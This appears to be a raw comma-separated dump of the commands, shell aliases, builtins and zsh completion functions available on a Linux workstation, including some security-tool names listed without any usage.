3bar,ruby,ftl_check,ctest,qemu-x86_64,btop,nmtui-hostname,manpath,reboot,avahi-publish-service,konsoleprofile,README.md,pg_receivewal,tss2_verifyquote,gpgsm,llvm-debuginfod,xrandr,cal,pg_recvlogical,qrencode,zless,whiptail,unbound-anchor,kbxutil,hcxeiutool,remotinator,BurpSuiteCommunity,vbox-img,postgresql-upgrade,heif-convert,bzgrep,tss2_nvwrite,qemu-storage-daemon,rpmkeys,arjdisp,hp-fab,sensors-conf-convert,link,monitor-sensor,mutter,skopeo,aseqnet,vmwgfxctrl,pcmanfm-qt,source-highlight-settings,sqfscat,vdir,lint,qdirstat-cache-writer,mpstat,grotty,jupyter-nbclassic-extension,virt-qemu-run,qemu-hppa,rtmon,firefox,qemu-sparc-static,systemd-cgtop,numad,avahi-resolve,jstat,gpgv2,memstrack,getkeycodes,fab,lvmsadc,pphs,encguess,rpmdumpheader,smidump,chfn,btrfs-find-root,ssh-copy-id,mount.veracrypt,pkcs15-tool,pdftohtml,avinfo,ag-tool,systemd-cryptenroll,paps,stty,kactivities-cli,mcat,pw-midirecord,nl-class-list,grub2-probe,lsdiff,jmod,tclsh8.6,fros,btattach,llvm-readelf,bison,gwenview,diff3,unix2dos,qemu-microblaze,gunzip,tzselect,arch,applydeltarpm,selabel_get_digests_all_partial_matches,gts2stl,baobab,pam_namespace_helper,depmod,qemu-system-xtensa,strings,smb2-quota,sm3hmac,gstack,kbdrate,virtualenv-clone,tpm2_policyauthorizenv,java,qemu-system-ppc64,cstool,via_regs_dump,usb_modeswitch_dispatcher,captype,mdsearch,qemu-sparc64,xorrecord,abrt-action-notify,runscript,gv2gxl,pod2text,isympy,virt-admin,pkttyagent,semodule_link,grops,qemu-mips64-static,sharkd,potrace,scp-dbus-service,g13-syshelp,clevis-decrypt-tpm2plus,llvm-dwarfdump,neqn,abrt-action-analyze-python,autrace,POST,tpm2_policyticket,xfs_io,dump-utmp,iio_event_monitor,gdk-pixbuf-thumbnailer,tor-gencert,plipconfig,named-checkzone,unpigz,factor,espdiff,qemu-aarch64-static,qemu-hppa-static,r2agent,setterm,xqmstats,fuser,mount.smb3,swtpm_bios,anaconda-nm-disable-autocons,nstat,gnome-shell,hunspell,isohybrid,cifs.idmap,xrdb,flashcp,lvmdbusd,python-argcomplete-tcsh,tpm2_policyauthvalue,chcat,zpool,pg_dumpall,rhythmbox,resizecons,virt-builder-repository,ascii-xfr,opensnitch-ui,jupyter-server,virt-host-validate,nf-exp-list,mmc-tool,lpstat,lsusb,pg_ctl,htop,nftl_format,pdftops,sysctl,gencat,virt-viewer,look,withsctp,pass,os-prober,ssh-agent,buddy-ng,fdp,tss2_pcrread,analyseplugin,fzsftp,x86_64,libcdb,fc-validate,pybidi,unflatten,7z,osinfo-query,CyberChef_v10.5.2,znew,uxterm,lftp,i3-sensible-terminal,mount.vboxsf,saslauthd,foomatic-rip,fbguard,funzip,systemd-inhibit,fcgistarter,upload-system-info,vboxaudiotest,sdpscanner,feh,mount,slirp4netns,tpm2_createpolicy,iscsistart,signon-ui,tsort,mediawriter,mountpoint,HEAD,gio-querymodules-64,gcr-viewer-gtk4,servicemenuinstaller,tpm2_nvundefine,ip6tables-translate,tpm2_eventlog,cache_dump,idn,pkla-admin-identities,rcvboxballoonctrl-service,arecord,oocalc,tpm2_nvreadpublic,dumpiso,teamnl,evince-thumbnailer,stunbdc,dropuser,containerd-shim,thin_dump,qemu-sh4-static,xzcat,patchview,gvcolor,tss2_exportpolicy,cracklib-packer,gfix,xmlwf,netcat,pkexec,service,getfattr,pidwait,xfs_repair,virt-alignment-scan,tss2_unseal,nfsdclddb,virt-resize,pam_console_apply,sendiso,brltty-prologue.bash,.gitattributes,ipmi-dcmi,pw-config,loadunimap,vdpa,qemu-system-m68k,dolphin,bmc-device,load_policy,xfwm4-workspace-settings,lgroupadd,virtxend,sfdisk,ldd,obs,lpc.cups,xzless,pipewire-pulse,montage,adwaita-1-demo,virt-df,unafs,setfattr,qemu-system-rx,qmi-firmware-update,sord_validate,blkdiscard,ebtables-restore,vimdot,ts_print,tss2_createseal,sha384hmac,unix_update,fsck.xfs,iio_generic_buffer,xfconf-query,dbus-broker-launch,ipmi-fru,tss2_sign,era_dump,groupmems,gsl-histogram,grpunconv,gtk4-launch,setfacl,rpcclient,virt-top,avdmanager,fprintd-delete,svnfsfs,isdv4-serial-inputattach,nl-cls-delete,prezip,package.xml,avahi-publish,system-config-abrt,clevis-encrypt-tang,streamzip,flock,easside-ng,upower,rotatelogs,pppd,getcap,canberra-gtk-play,tcpnice,sha1hmac,dmeventd,numfmt,era_invalidate,tpm2_certify,whois.md,lex,jstatd,fatlabel,remote-viewer,glib-compile-resources,brotli,info,selinuxexeccon,pg_resetwal,FileCheck,nf-ct-add,libguestfs-test-tool,dialog,llvm-strings,gnutls-cli,abrt-action-analyze-xorg,dmfilemapd,fc-match,srec_cat,tpm2_nvsetbits,ipcmk,wordview,hdparm,llvm-tapi-diff,gnome-abrt,wmf2svg,nfsconf,hp-sendfax,gnome-software,secret-tool,ntfsrecover,eu-size,enumdir_chmLib,stest,elConnect.sh,brltty-prologue.sh,ffmpeg,gtester-report,lightdm-settings,common,sos-collector,kvm_stat,yt-dlp,xmlsec1,lgroupdel,tpm2_policyduplicationselect,tpm2_incrementalselftest,glusterfs,mid3cp,rpcbind,aircrack-ng,jupyter-run,glib-compile-schemas,vacuumdb,mount.nfs,tpm2_verifysignature,tlp-stat,netkey-tool,pg_checksums,networkctl,sfdp,qt-faststart,usb_modeswitch,tpm2_startup,ddns-confgen,edonr256-hash,fedora-third-party,runc,osinfo-db-path,stap-profile-annotate,iptstate,gcov,mkmanifest,mkfs.btrfs,powernow-k8-decode,qemu-mips-static,ocsptool,gsplit,gzexe,msggrep,gluster,scalar,nf-queue,vpnc,grub2-mkrelpath,lvextend,dconf,red,openconnect,umount.nfs,kwalletd5,vmware-vmblock-fuse,fectest,nload,tpm2_activatecredential,rcvboxweb-service,psql,matlab,gtk4-update-icon-cache,ibus-setup,ps2pdf12,ps2pdf13,onboard-settings,newgrp,ps2pdf14,nbackup,sc-hsm-tool,hp-config_usb_printer,jupyter-migrate,src-to-paps,e4crypt,mbim-network,gimp,rev,cmp,tss2_encrypt,nodemon,rhythmbox-client,hostnamectl,nl-neigh-delete,composite,init,jrunscript,dot2gxl,lib,lid,gost12-256-hash,minicom,gitdiff,sss_ssh_authorizedkeys,run-on-ac,vgscan,libwmf-fontmap,ppdmerge,gjs-console,runcon,grub2-set-bootflag,e2label,pw-top,freetype-config,usbmuxd,lit,blivet-gui-daemon,clang-16,gnome-browser-connector-host,doxysearch.cgi,gtk-encode-symbolic-svg,eu-findtextrel,mandb,mren,lvconvert,pptp,unar,combinediff,chattr,debug,mount.fuse3,containerd,gdk-pixbuf-pixdata,flash_otp_write,abrt-dump-journal-core,write,lxsu,gnome-keyring-3,mogrify,libpng-config,peekfd,dirname,chrt,ipmi-config,pipenv,mdeltree,tensorboard,fmt,vboxmanage,clevis-encrypt-tpm2,nginx-upgrade,sha224sum,qpdf,smistrip,orc-bugreport,delpart,mid3iconv,nl-link-ifindex2name,vgmerge,wavpack,vmware-user-suid-wrapper,col,iscsid,pw-loopback,sulogin,radare2,pdftotext,pygrun,dumpe2fs,chsh,uname,mkfs.cramfs,wl-copy,ipcrm,support,qterminal,agetty,smbinfo,doc_loadbios,ufw,tpm2_rsadecrypt,checkmodule,idle2.7,lightdm-gtk-greeter-settings,arpd,xtables-monitor,qemu-system-cris,qemu-mips64el,llvm-mca,cups-genppd.5.3,eu-readelf,quota,oowriter,msginit,mxtar,pkcs11-tool,wpa_passphrase,cpp,xfce4-terminal,normalizer,addr2line,rustfmt,rsyslogd,wget,adduser,ipython,llc,qemu-sparc32plus-static,nm-online,msgfilter,ip6tables-nft,podman,screenshot2,qemu-system-microblazeel,release,lli,lxqt-config-monitor,validatetrans,llvm-dlltool,nl-addr-delete,ctstat,iasecc-tool,gvmap.sh,iptables-nft-save,mcelog,chardetect,vboxwebsrv,tpm2_nvreadlock,torify,pango-view,bzmore,pg_verifybackup,virt-ls,anacron,cgdisk,systemd-ask-password,kbd_mode,nl-route-delete,abrt-watch-log,dijkstra,inv,gtk-update-icon-cache,llvm-libtool-darwin,llvm-cvtres,update-xscreensaver-hacks,locale,alt-java,findmnt,service-units,nf-ct-list,gts2oogl,vmware-rpctool,lxqt-config-brightness,mount.zfs,iostat,fips-finish-install,splitdiff,imsettings-switch,lsm2bin,llvm-dis,qemu-nbd,mii-tool,gcov-tool,find-jar,sss_cache,xfs_estimate,qemu-xtensa-static,jimage,pylupdate5,sctp_darn,mtoolstest,pyrsa-keygen,ip6tables-nft-restore,setsebool,edonr512-hash,jupyter-serverextension,pyasn_util_download.py,xhost,cifscreds,pasta.avx2,padsp,llvm-profgen,libreoffice,slick-greeter-enable-tap-to-click,obxprop,grub2-get-kernel-settings,ag-backup,dbwrap_tool,abrt-action-analyze-vmcore,gettext.sh,WebKitWebDriver,llvm-undname,appstream-compose,fzf-tmux,selinuxenabled,stapdyn,chvt,serve_image,firewall-offline-cmd,nl-addr-add,linux-boot-prober,llvm-lto2,insmod,cargo-miri,cracklib-update,transmission-create,chcon,pamon,run-parts,clevis-luks-common-functions,libvirtd,xclip,llvm-cxxdump,gobject-query,cronnext,e4defrag,ypdomainname,ibus,cksum,zvbi-atsc-cc,vgimport,__pycache__,zlib-flate,virt-cat,tpm2_nvwritelock,lspci,xscreensaver-demo,tss2_nvread,gamemodelist,sudo,baloo_filemetadata_temp_extractor,jcat-tool,delete_all_binaries.py,nfsdcld,mkfontdir,xzcmp,ipmi-detect,clang,setquota,ncat,webspy,ooffice,mcheck,kmod,vacuumlo,nmtui,lsmem,vlock,pip2.7,wall,pyrsa-encrypt,lxqt-notificationd,rls,chcpu,mkfs.minix,lvmsar,rpmdb,grl-inspect-0.3,cancel,accessdb,jlink,cups-genppdupdate,ctr,xgettext,vstp,l2test,goid-tool,pkginfo,lpc,unarj,flash_lock,elfpatch,python2-config,gtroff,tpm2_setclock,UnicodeNameMappingGenerator,glib-mkenums,dnf4,qemu-loongarch64,irb,kjs5,nl-util-addr,lpq,lpr,check-binary-files,mii-diag,tpm2_nvwrite,smbget,sensors-detect,enum_chmLib,getconf,startx,makedeltarpm,telegram-desktop,bluetoothctl,ipmi-ping,compsize,eidenv,cut,pyrsa-sign,fcrackzip,qmicli,nl-qdisc-add,zerofree,cryptsetup,pw-record,gpgconf,dbus-launch,tf_upgrade_v2,transmission-show,ftp,abrt-harvest-vmcore,identify,sane-find-scanner,make_f2fs_casefold,sas_disk_blink,fprintd-enroll,sparsify,kiconfinder5,kwriteconfig5,abrt-dump-journal-oops,centrino-decode,rclone,brltty-cldr,ipmimonitoring,kate-syntax-highlighter,tcptraceroute,onboard,reordercap,check_hd,nhlt-dmic-info,vncpasswd,gtstransform,nroff,srec_cmp,cvt,dockerd-rootless.sh,uniq,arptables-restore,precat,gml2gv,brew,rediff,meinproc5,opt,panelctl,stap-merge,script,llvm-gsymutil,brctl,quotacheck,dumpmscat,GET,lib64,openoffice.org,thin_restore,python3.11-config,blivet-gui,racc,qemu-x86_64-static,airodump-ng-oui-update,key.dns_resolver,elfedit,airscan-discover,intel_sdsi,ftl_format,fc-cat,jupyter-dejavu,irqbalance,grpck,fsck,verify-uselistorder,knewstuff-dialog,ippfind,phar,pw-cat,telnet,pyasn_util_convert.py,bzegrep,rpm,irqtop,bcache-super-show,aseqdump,semanage,ntfsundelete,postmaster,strace,ffplay,touch,webmitm,gdbus,mksquashfs,lastb,rubberband,umount,delv,keyctl,abrt-server,nice,inv3,kwrapper5,tpm2_nvdefine,rpc.idmapd,snice,mkswap,gtk-builder-tool,pygettext2.py,lxpolkit,msgmerge,arp-fingerprint,quotastats,abrt-action-generate-backtrace,grub2-mkimage,systemd-run,htdigest,tpm2_sessionconfig,CODE_OF_CONDUCT.md,tpm2_import,grub2-mkrescue,examples,wvunpack,analysis_options.yaml,lsusb.py,veracrypt-uninstall.sh,post-grohtml,jemalloc.sh,vgcfgbackup,netstat,qemu-aarch64_be,msguniq,choom,iscsiuio,eu-make-debug-archive,osinfo-db-validate,corepack,updatedb,mailer,tpm2_pcrreset,gpgparsemail,arptables,json_verify,qemu-system-sparc,base32,llvm-sim,lua,more,ppp-watch,boltctl,swtpm_ioctl,ca-legacy,idiag-socket-details,antiword,locate,lgroupmod,dockerd-rootless-setuptool.sh,compress_images.sh,mkpasswd,jupyter-kernelspec,mbimcli,slop,animate,csplit,VBoxControl,evince-previewer,umount.nfs4,zvbi-ntsc-cc,mergecap,flash_otp_dump,qvlc,rasign2,matchpathcon,passt,clevis-luks-unlock,unicode_stop,cifsdd,tclsh,piconv,cups-calibrate,asn1Decoding,cracklib-format,lvm_import_vdo,lsar,mdadm,rfkill,llvm-opt-report,python3.11,git-upload-archive,shred,pasta,rpc.mountd,jsonpointer,mtd_debug,hwclock,tpm2_hmac,paste,lvm,htdbm,libwacom-list-local-devices,git-receive-pack,pyrsa-verify,rustc,qemu-or1k,zfs-fuse,unopkg,lprm.cups,mutagen-pony,rofiles-fuse,lvmdump,lvs,clean-binary-files,brltty-clip,timeout,torbrowser-launcher,unoconv,fribidi,lvmpolld,kubectl,thefuck,i3-sensible-pager,fsck.msdos,infocmp,google-oauthlib-tool,ipython3,vgcfgrestore,xdg-open,make-dummy-cert,tpm2_getrandom,bashbug-64,fzf,m17n-conv,implantisomd5,qemu-arm-static,nl-pktloc-lookup,uiautomatorviewer,python2.7-config,gnome-help,urlsnarf,ModemManager,sftp,liveinst,svnadmin,gpg-connect-agent,jshell,fips-mode-setup,pwscore,thermald-set-pref,tss2_getplatformcertificates,asn1Coding,tflite_convert,inxi,git-shell,gnome-font-viewer,gpgsplit,conmon,xfce4-kiosk-query,x86_64-redhat-linux-gcc,pstree.x11,dkms,virtualbox,rctest,mid3v2,base64,hex2hcd,unwrapdiff,node,tpm2_policypcr,flutter_root.iml,qemu-aarch64_be-static,vmware-xferlogs,kstats,hostid,mkfifo,xisxwayland,systemd-umount,vmware-user,virtsecretd,eu-ranlib,virtualenv,pango-segmentation,pfbtopfa,kreadconfig5,zcat,ntfsdump_logfile,update-ca-trust,brltty-atb,jinfo,msgfmt2.py,install,fsidd,bmc-info,umount.udisks2,virt-win-reg,fusermount3,tss2_setdescription,rpcdebug,dosfsck,dvcont,expand,rdfproc,createuser,tpm2_policynvwritten,hp-plugin,remmina-file-wrapper,lastlog,unzstd,gobuster,nl-neigh-list,xdg-dbus-proxy,checkpolicy,lsmod,rvi,qemu-s390x-static,fc-cache-64,fc-list,grilo-test-ui-0.3,update-smart-drivedb,scsi_ch_swp,ghunt,fancontrol,spa-inspect,guild2.2,useradd,Xwayland,xfce4-set-wallpaper,hydra,cd-it8,virtlogd,fc-scan,shutdown,psktool,dbus-cleanup-sockets,pdfsig,sktest,mtype,xfs_bmap,selabel_lookup,realm,ipmaddr,dmraid,bluemoon,fdformat,hugo,ivstools,tpm2_policylocality,proguard,uptime,wmf2eps,torchrun,mkfs.ubifs,userdbctl,sort,systemd-mount,gnutls-serv,whoismac,oid2name,llvm-readobj,virtlxcd,groups,rmiregistry,lxqt-about,newsboat,hb-info,pdffonts,xb-tool,tpm2_testparms,bs2bstream,kcookiejar5,dnf-3,qemu-xtensa,gnome-logs,lsfd,tpm2_changeauth,exportfs,xfs_copy,markdown-it,wireplumber,xdg-user-dirs-update,gupnp-dlna-ls-profiles-2.0,libwacom-update-db,psfgettable,llvm-bcanalyzer,rawshark,getopt,dirmngr,consolehelper,mako-render,moggsplit,xfs_growfs,lpoptions,pyftsubset,diskUsage.sh,pdata_tools,markdown_py,gimp-console-2.10,runlevel,virt-tar-in,regpatch,virt-get-kernel,circo,dbus-run-session,llvm-dwp,grub2-install,objcopy,gst-stats-1.0,matlab_2021b,dehtmldiff,lpinfo,setpci,stdbuf,whois,mount.ntfs-fuse,vgmknodes,grub2-switch-to-blscfg,pydoc,systemd-tty-ask-password-agent,taskset,tpm2_quote,ts_print_mt,airolib-ng,toco,cpack3,dex-autostart,llvm-profdata,escputil,watchmedo,grub2-set-default,ts_calibrate,autoscan,hostname,addpart,nandtest,tracepath6,reset,userdel,xkbcomp,bmc-config,pkg-config,nl-list-caches,paplay,lockdev,installkernel,llvm-remark-size-diff,rename,eu-strip,brltty-tune,gcc-ar,spell,grdctl,ipmi-locate,llvm-tblgen,pwck,slabtop,mako-render-3,x86_64-redhat-linux-c++,magnet-link,toolbox,ndsctl,rust-gdb,sctp_test,filesnarf,arptables-save,lshw,qmi-network,qemu-system-microblaze,thin_ls,cmake,qemu-system-mipsel,tpm2_gettime,authselect,file2brl,mbadblocks,resolvectl,ipmi-pet,openvpn,qemu-mips64,scramble,lxqt-config-locale,pwmconfig,vgremove,fixcvsdiff,NEWS,rpc.nfsd,jffs2reader,pyuic5,pg_waldump,sanstats,zipgrep,apropos.man-db,pdfdetach,abrt-dbus,tss2_gettpm2object,flex++,bcache-status,gstat-fb,spa-monitor,lwp-mirror,virt-diff,pw-cli,tor-print-ed-signing-cert,invoke,hpijs,setup-nsssysinit.sh,doxygen,zipinfo,fsck.cramfs,qemu-system-i386,i3-sensible-editor,pwdx,nmcli,setkeycodes,rdma,lsmtd,xxd,anthy-agent-unicode,yelp.bak,tapestat,size,hashcat,grub2-mkconfig,transmission-gtk,ninja,ipmi-sel,spa-acp-tool,svndiff,lightdm-gtk-greeter-settings-pkexec,f2py3.11,chgpasswd,heif-thumbnailer,openssl,json_xs,last,streamlit,e2mmpstatus,rpyc_classic.py,adb,CODEOWNERS,qemu-edid,netlify,transmission-edit,bzip2recover,tred,gnome-browser-connector,tree,fprintd-list,thin_metadata_pack,7za,nginx,pygettext.py,diffstat,neato,lvdisplay,ps2ps,dcb,xclip-cutfile,osinfo-db-import,firewalld,avahi-daemon,tpm2_ecdhzgen,lslogins,tss2_nvsetbits,chroot,grub2-mkpasswd-pbkdf2,debugfs,smilint,f2py,glxinfo64,reporter-kerneloops,signond,virtnwfilterd,rearj,consoletype,gmake,bs2bconvert,ifstat,code,abrt-bodhi,abrt-action-analyze-vulnerability,anaconda-disable-nm-ibft-plugin,ebtables-translate,clevis-decrypt,pdf2ps,fgconsole,cddb_query,qemu-kvm,shellcheck,rdoc,ntfsusermap,i3-input,wvtag,arpspoof,selabel_lookup_best_match,socat,lsattr,flatpak-bisect,readtags,ROPgadget,llvm-debuginfo-analyzer,eapol_test,wireshark,uchardet,iptables-restore,nl-tctree-list,gitdiffview,xmllint,elf2dmp,qemu-alpha,ipmipower,zstreamdump,qemu-armeb,gcc,jar,llvm-debuginfod-find,tss2_changeauth,luseradd,virt-log,lxqt-config-notificationd,apropos,unxz,pkcs15-crypt,axfer,diffimg,slick-greeter-check-hidpi,gnome-session-quit,llvm-remarkutil,split-file,tpm2_rc_decode,tpm2_certifyX509certutil,tiffcomment,qemu-keymap,ipmi-chassis-config,pw-midiplay,zstdcat,guestunmount,qemu-xtensaeb,install-info,i3-msg,dbus-broker,ntfscat,cifs.upcall,vboxautostart,tss2_authorizepolicy,postgres,VBoxManage,luajit,mpage,virtproxyd,ctrlaltdel,clinfo,chacl,gdb,vpddecode,grub2-mkfont,dev,grub2-mount,captoinfo,osinfo-detect,genhostid,ccomps,lftpget,tpm2_hash,gdm,disablenx,psfaddtable,rpm2cpio,man,busctl,llvm-objcopy,hsmarkdown,fix-qdf,ld.so,lxqt-runner,qemu-mipsn32el,wihotspot-gui,perl,checkXML5,roqet,gst-transcoder-1.0,setsid,preunzip,host,qemu-system-s390x,slabinfo,report-gtk,zfs-fuse-helper,qemu-sh4eb-static,fzputtygen,lsns,gcov-dump,nodogsplash,mdel,llvm-tli-checker,ngettext,i3-nagbar,unicode_start,gsbj,gdmflexiserver,mac2unix,gem,ztest,imsettings-reload,nl-class-delete,glxgears,teamdctl,uname26,jdb,strip,postgresql-setup,gcm-picker,abrt-handle-upload,lsof,fc-pattern,eu-elflint,tpm2_loadexternal,selinuxdefcon,kwallet-query,tss2_nvextend,pw-play,pyserial-miniterm,ts_print_raw,dmidecode,rvim,activate-global-python-argcomplete,capsh,cache_writeback,pinentry-gnome3,luserdel,ipp-usb,pydoc2,unlink,pydoc3,mkntfs,patchwork,arptables-nft-restore,mkfs.hfsplus,openpgp-tool,brltty-trtxt,mcd,pipewire,gpio-event-mon,pandoc,pppdump,qemu-or1k-static,speaker-test,ipmi-pef-config,zcmp,sqlcipher,clevis-luks-report,dnsspoof,wl-paste,msgattrib,perl5.36.1,stapbpf,lastcomm,pygtk-demo,jupyter-trust,nfsidmap,smbtree,hp-firmware,tpm2_encryptdecrypt,LICENSE,cyrusbdb2current,cfdisk,traceroute6,gost12-512-hash,tpm2_policynv,exfat2img,2to3-3.11,tpm2_policysecret,ntfsck,spa-resample,jdeprscan,getsubids,pinentry-curses,stap-prep,llvm-cfi-verify,newgidmap,gimp-console,ntfscp,sadf,tpm2_pcrextend,volatility3-develop,gpg2,lxqt-leave,shout,heif-info,gpg-card,clevis-decrypt-null,clear,pygettext3.py,gsdj,virt-pki-query-dn,watchgnupg,lslocks,lprm,qdirstat,filezilla,tcsd,btrfsck,nfsdcltrack,abrt-action-check-oops-for-alt-component,osage,tipc,parted,virt-xml,natpmpc,tpm2_policyor,nautilus_context_menu_scripts,dig,maim,bcomps,main,lvmconfig,chromium-browser,sar,mdu,pg_isready,chage,envsubst,qemu-cris-static,pip3.11,iscsiadm,svnversion,efibootmgr,packages,dir,gcm-import,testlibraw,pkla-check-authorization,jfr,gsec,python-argcomplete-check-easy-install-script,gnome-clocks,hcxwltool,bzcat,osinfo-install-script,clevis,lxqt-backlight_backend,pyrsa-decrypt,c++,gtk3-demo,eu-unstrip,gofmt,rax2,sha224hmac,tiff2fsspec,vmstat,msgcat,checkisomd5,gcore,patch,qemu-loongarch64-static,httxt2dbm,users,aclocal-1.16,hostapd,parsetrigrams,tpm2_getekcertificate,pydoc2.7,flutter,nmblookup,rvlc,brltty-ttysize,clang++,grub2-render-label,basename,lpasswd,prlimit,criu,systemd-machine-id-setup,gsound-play,xminicom,gpgv,ipset,sshpass,systemd-resolve,virtvboxd,lxqt-session,gpg-agent,mdmon,ipod-read-sysinfo-extended,mdir,pcscd,make,gio,hcxpsktool,foremost,dm_dso_reg_tool,eps2eps,passwd,qemu-system-riscv32,git,bzdiff,mokutil,scp,unhex,lightdm,abrt-dump-xorg,mediainfo,gst-inspect-1.0,mktemp,xzdec,offDisk.sh,qemu-nios2,gsoelim,tor-resolve,showmount,powerprofilesctl,era_check,gpio-hammer,virt-make-fs,msgfmt3.11.py,torsocks,grub2-bios-setup,dhclient,abrt-applet,dnls,dbl,glgga,dtop,gcsm,gbsb,gcss,groh,md,gupv,gbsg,gupav,dnc,gbsn,dni,gbso,gbsr,gds,chown,gbss,gdt,gignored,wifir,gdw,gpod,gpd,gsps,gpf,gpf!,glola,dclsa,gpr,gpu,gcans!,gpv,dcin,grep,lsa,xzgrep,gdup,gwtls,glols,dncn,grev,dils,gca!,gfa,gfg,gpristine,gfo,_,gmom,dpo,gwta,gwtmv,dr,glod,dndcn,gupom,dpu,glog,gra,grb,zfgrep,glol,gga,grh,grset,grm,gwip,grrm,gclean,grs,grt,ggpush,gru,grv,docker,et,gcn!,gamscp,gsb,gsd,gsh,gsi,ghh,gcam,grhh,chmod,py3,dxcit,gsr,grhk,gss,gst,gcas,gsu,gsta,gpsup,grss,grst,vol,gsw,gstc,gstd,drm,grhs,dcls,drs,glods,gstl,gcasm,dsta,dstp,git-svn-dcommit-push,gdca,gstaa,dnrm,gtv,fgrep,gpsupf,gama,ggsup,dst,run-help,glgg,dipu,gdct,drit,gdcw,xzfgrep,glgm,gams,glgp,gup,grup,dib,gupomi,gbnm,dii,gunwip,gignore,dit,ggpur,gke,dvls,gloga,gcor,zegrep,gwtrm,drm!,gswc,gmtl,vold,gswd,watch,gcpa,ggpull,dus,dirm,gcpc,gcssm,gswm,volu,zgrep,gwch,gaa,glg,gc!,gbD,gwt,glo,dvi,glp,gam,gmum,gbs,grmv,grbs,dlo,gmtlvim,egrep,gca,gcb,gunignore,gcd,dxc,gcf,gcmsg,dvprune,gbgd,xzegrep,gcl,globurl,gitlg,gcm,gco,gcp,gcs,gupa,ls,unset,rehash,popd,ulimit,jobs,disable,compfiles,printf,autoload,noglob,pushln,zle,exit,false,times,sched,setopt,getln,builtin,let,bg,zstat,which,unhash,zparseopts,logout,disown,type,source,eval,comptags,compdescribe,compctl,zmodload,zregexparse,history,return,exec,compadd,emulate,chdir,ttyctl,test,comparguments,pushd,functions,zstyle,print,comptry,alias,shift,-,.,bindkey,true,hash,strftime,compset,compvalues,getopts,compgroups,enable,limit,echotc,echo,wait,dirs,unsetopt,read,:,bye,echoti,compquote,unfunction,fc,vared,unalias,kill,compcall,where,fg,zformat,suspend,unlimit,break,set,continue,command,zcompile,whence,umask,trap,log,_git_log_prettily,_x_colormapid,__zoxide_hook,_arg_compile,_fuse_values,nvm_cache_dir,_omz::pr::clean,nvm_strip_iojs_prefix,_xset,_exec,_vmctl,_gnu_generic,_enscript,_getclip,_ispell,_omz_diag_dump_os_specific_version,_capabilities,_fetch,_find_net_interfaces,_darcs,_next_tags,_xv,_bzr,_quilt,_dunstctl,_xz,_routing_domains,_history_modifiers,spectrum_bls,_ionice,_piuparts,_espeak,nvm_get_make_jobs,_nkf,_svn-buildpackage,_dpatch-edit-patch,_dtruss,_yp,_file_flags,gbda,_toilet,git_commits_ahead,_omz::changelog,_psutils,nvm_binary_available,_compadd,_systemd-inhibit,_generic,_main_complete,_webbrowser,nvm_npm_global_modules,nvm_has_system_iojs,git_prompt_status,git_commits_behind,_moosic,nvm_print_formatted_alias,omz_urldecode,_correct_word,_bittorrent,_busctl,nvm_set_colors,_dmesg,has_typed_input,_feh,_slabtop,_dchroot-dsa,_calendar,_lz4,_rax2,_rabin2,_command,_usbconfig,_netstat,compinit,_ldconfig,_systemctl,_pax,_wl-copy,_omz::plugin::load,_x_font,nvm_strip_path,_subversion,cdi,_ccal,_parameters,_menu,_printenv,omz_urlencode,_omz_diag_dump_echo_file_w_header,_mplayer,nvm_clang_version,gawkpath_default,_complete_help_generic,_kdeconnect,_lldb,_pbm,_groups,_cygcheck,_describe,clipcopy,_deb_packages,_read_comp,nvm_rc_version,_split,_otool,_cygpath,elCon,nvm,nvm_is_natural_num,_vim-addons,_dirs,_redirect,_combination,_omz_diag_dump_check_core_commands,_wait,_bootctl,_read,compdef,_dsh,_acroread,_apachectl,_xinput,nvm_print_npm_version,_print,_add-zle-hook-widget,nvm_curl_libz_support,_look,_less,_trap,_omz::plugin,_x_title,_pdf,_fw_update,ggfl,_arping,_find,compdump,_x_locale,_fink,takegit,_cpio,_npm,_list_files,nvm_ls_remote_iojs,_cssh,_arch_archives,_x_cursor,command_not_found_handle,_file_systems,_options_set,_graphicsmagick,_newsgroups,_omz::theme::use,_bash,_wiggle,_ethtool,_autocd,_yafc,_fortune,nvm_is_iojs_version,_chattr,_caffeinate,_timeout,omz_history,command_not_found_handler,nvm_download,_mere,_rlogin,_setsid,env_default,_xterm,_dict_words,_user_math_func,_pkg_instance,_printers,_ltrace,_directories,_wpa_cli,_chown,_pkgtool,_parameter,nvm_version_path,_x_selection_timeout,_dvi,_object_classes,gawkpath_prepend,_guilt,_socket,_asciinema,_directory_stack,_cmdstring,__vte_prompt_command,_ps1234,_cal,_cygstart,_xpdf,_dpkg_source,_scselect,_watch,_update-rc.d,_cat,diff,chruby_prompt_info,_csup,_brace_parameter,_smit,_remote_files,_path_files,_ldap,nvm_get_checksum,_axi-cache,_touch,_pkg-config,compaudit,_lynx,_perl_modules,_diff3,_xfig,_tree,_history,_gqview,_postgresql,_sysstat,hg_prompt_info,_debsnap,_comp_locale,_ant,_condition,_php,_hwinfo,_fs_usage,_gnupod,_users_on,_mysqldiff,_bpf_filters,current_branch,_wajig,_vared,_omz::plugin::enable,nvm_has_system_node,_zfs_dataset,quote-paste,_visudo,_uscan,_ktrace,_xft_fonts,_xdvi,_vars,down-line-or-beginning-search,_localedef,_toolchain-source,bashcompinit,_sysclean,_zed,nvm_find_project_dir,_dpkg,_fmt,_rahash2,_pip,_chkconfig,_x_display,_wl-paste,_fetchmail,_ssh,_dkms,_lscfg,_extensions,urlglobber,nvm_remote_versions,_bsd_disks,_shred,_valgrind,_java_class,_cdr,_entr,_kld,_nbsd_architectures,_pspdf,_apm,_smartmontools,nvm_resolve_local_alias,git_current_user_name,_apt,_killall,_user_admin,_terminals,_omz::help,_zfs,git_current_branch,_scutil,_vpnc,_mkdir,_mosh,_zparseopts,_pfexec,_basename,_loadkeys,_man,_ngrep,_selinux_types,_acpi,nvm_validate_implicit_alias,_inetadm,_mat,_logical_volumes,nvm_install_binary_extract,_options,_svcs_fmri,nvm_extract_tarball,_zcalc,_dumper,_myrepos,nvm_supports_xz,_readelf,_sd_hosts_or_user_at_host,_gsettings,_date_formats,_selinux_users,_debsign,_tcpdump,_date,nvm_is_valid_version,_other_accounts,_arp,take,_antiword,_systemd-analyze,_stgit,nvm_curl_version,_omz::theme::list,_urpmi,_tput,_mencal,_dates,_sqlite,__zoxide_zi,_asciidoctor,_disable,_x_color,_osascript,_qemu,__nvm_alias,_stat,_rmdir,_lighttpd,_patchutils,expand-or-complete-with-dots,_rar,_systat,_transmission,_pkgadd,_zip,_mkshortcut,_zsh-mime-handler,_xt_session_id,_finger,_umountable,_mkfifo,_dpkg-cross,_kvno,_systemd-delta,_dladm,_routing_tables,_sysctl,takedir,_x_modifier,_scons,nvm_alias_path,_urxvt,_run-help,_match,_perf,_wipefs,_x_window,git_prompt_info,_cvsup,_ecasound,_perl,_ulimit,_systemd